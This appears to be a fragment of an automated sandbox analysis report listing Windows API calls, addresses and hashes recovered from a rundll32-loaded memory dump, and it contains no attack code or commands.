                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000,00000001,?,6E243E74,6E23F5F6), ref: 6E247C0F
                                                                                                                                                                                                                                                                      • Part of subcall function 6E247BD5: CloseHandle.KERNEL32(6E270910,6E247C1F,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000,00000001), ref: 6E247BE5
                                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 6E247C1F
                                                                                                                                                                                                                                                                      • Part of subcall function 6E247B97: CreateFileW.KERNEL32(6E26DD58,40000000,00000003,00000000,00000003,00000000,00000000,6E247BC6,6E246B6D,00000001,?,6E243920,00000000,?,00000001,00000000), ref: 6E247BAA
                                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,6E23F667,00000000,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000), ref: 6E247C34
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                    • Opcode ID: e5fd61ecb2c54352c8bf2eed2ef41dbc4b347b3992cc299c9179e2be72fe1c13
                                                                                                                                                                                                                                                                    • Instruction ID: c5eb5911c063fb28d765f2d7896f0235507a8151d7e1f3577a679bcd0b015d4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5fd61ecb2c54352c8bf2eed2ef41dbc4b347b3992cc299c9179e2be72fe1c13
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F01C3610152DFBDF662FD1CC0CD893F6BFB4A7A1F044410FA29951A0D6728934DBA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    • API String ID: 0-2837366778
                                                                                                                                                                                                                                                                    • Opcode ID: 0e1467c51ca839c1c1521eb53528f2bf45432808041f19ef1d97527362e7fec4
                                                                                                                                                                                                                                                                    • Instruction ID: 1e53db9646c48c4b6a9a7d16aff94c1e03efa8c9ac5e048a2fe0e03364cc73e4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e1467c51ca839c1c1521eb53528f2bf45432808041f19ef1d97527362e7fec4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6419AF5A4013DAFDB11DBD9CC8599EBBBEEB89B10F304456E5149B200D7708940CF60
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%